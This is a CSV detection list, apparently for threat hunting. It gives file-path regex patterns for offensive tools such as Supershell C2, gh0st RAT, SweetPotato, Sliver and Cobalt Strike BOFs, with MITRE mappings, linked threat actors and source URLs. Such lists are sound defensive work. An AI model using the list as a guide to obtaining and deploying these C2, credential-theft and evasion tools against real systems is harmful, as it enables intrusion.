"*/stuxnet-detect.nse*",".{0,1000}\/stuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11696"
"*/subbrute.git*",".{0,1000}\/subbrute\.git.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11697"
"*/subbrute.py*",".{0,1000}\/subbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11698"
"*/subbrute/releases/download/*",".{0,1000}\/subbrute\/releases\/download\/.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11699"
"*/subdomain.yaml*",".{0,1000}\/subdomain\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","11700"
"*/subdomains.txt*",".{0,1000}\/subdomains\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","#linux","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","11701"
"*/subdomains_n0kovo_big.txt*",".{0,1000}\/subdomains_n0kovo_big\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","11702"
"*/subdomains-10000.txt*",".{0,1000}\/subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11703"
"*/subdomains-top1mil-110000.txt*",".{0,1000}\/subdomains\-top1mil\-110000\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","11704"
"*/subdomains-top1mil-5000.txt*",".{0,1000}\/subdomains\-top1mil\-5000\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","11705"
"*/Sublist3r*",".{0,1000}Sublist3r.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","11706"
"*/submit_to_nemesis.py*",".{0,1000}\/submit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11707"
"*/submit_to_nemesis.sh*",".{0,1000}\/submit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11708"
"*/submit_to_nemesis.yaml*",".{0,1000}\/submit_to_nemesis\.yaml.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11709"
"*/Suborner.git*",".{0,1000}\/Suborner\.git.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","11710"
"*/sudo_tracer.c*",".{0,1000}\/sudo_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","11711"
"*/sudoers.d/reconFTW*",".{0,1000}\/sudoers\.d\/reconFTW.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","11712"
"*/sudomy.api*",".{0,1000}\/sudomy\.api.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","11713"
"*/sullo/nikto*",".{0,1000}\/sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","11714"
"*/sunder.exe*",".{0,1000}\/sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","11715"
"*/sunlogin_rce*",".{0,1000}\/sunlogin_rce.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","11716"
"*/Suntour.ps1*",".{0,1000}\/Suntour\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","11717"
"*/Sup3r-Us3r/scripts/*",".{0,1000}\/Sup3r\-Us3r\/scripts\/.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","11728"
"*/supermicro-ipmi-conf.nse*",".{0,1000}\/supermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11729"
"*/Supernova.exe*",".{0,1000}\/Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","11730"
"*/Supernova.git*",".{0,1000}\/Supernova\.git.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","11731"
"*/SuperProfileDLL*",".{0,1000}\/SuperProfileDLL.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11732"
"*/Supershell.tar.gz*",".{0,1000}\/Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11733"
"*/supershell/login/auth*",".{0,1000}\/supershell\/login\/auth.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11734"
"*/Supershell/releases*",".{0,1000}\/Supershell\/releases.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11735"
"*/Suprise/Suprise.exe*",".{0,1000}\/Suprise\/Suprise\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","11737"
"*/SurveyFile_x64_Release.exe*",".{0,1000}\/SurveyFile_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11738"
"*/SurveyRegistry_x64_Release.exe*",".{0,1000}\/SurveyRegistry_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11739"
"*/suspect/master/suspect.sh*",".{0,1000}\/suspect\/master\/suspect\.sh.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","11740"
"*/suspendresume.x64*",".{0,1000}\/suspendresume\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11741"
"*/suspendresume.x86*",".{0,1000}\/suspendresume\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11742"
"*/svchost_console.exe*",".{0,1000}\/svchost_console\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","11743"
"*/svn-brute.nse*",".{0,1000}\/svn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11744"
"*/SweetPotato.dll*",".{0,1000}\/SweetPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","11745"
"*/SweetPotato.dll*",".{0,1000}\/SweetPotato\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11746"
"*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11747"
"*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11748"
"*/Sweetpotato.exe*",".{0,1000}\/Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11749"
"*/SweetPotato.git*",".{0,1000}\/SweetPotato\.git.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11750"
"*/SweetPotato_CS*",".{0,1000}\/SweetPotato_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","11751"
"*/SweetPotato-master.zip*",".{0,1000}\/SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11752"
"*/SwitchPriv.exe*",".{0,1000}\/SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","11753"
"*/Synergy-httpx.git*",".{0,1000}\/Synergy\-httpx\.git.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","11757"
"*/syscalls/syscalls_windows.go*",".{0,1000}\/syscalls\/syscalls_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11758"
"*/syscalls/syswhispers/*",".{0,1000}\/syscalls\/syswhispers\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11759"
"*/syscalls/syswhispersv2*",".{0,1000}\/syscalls\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11760"
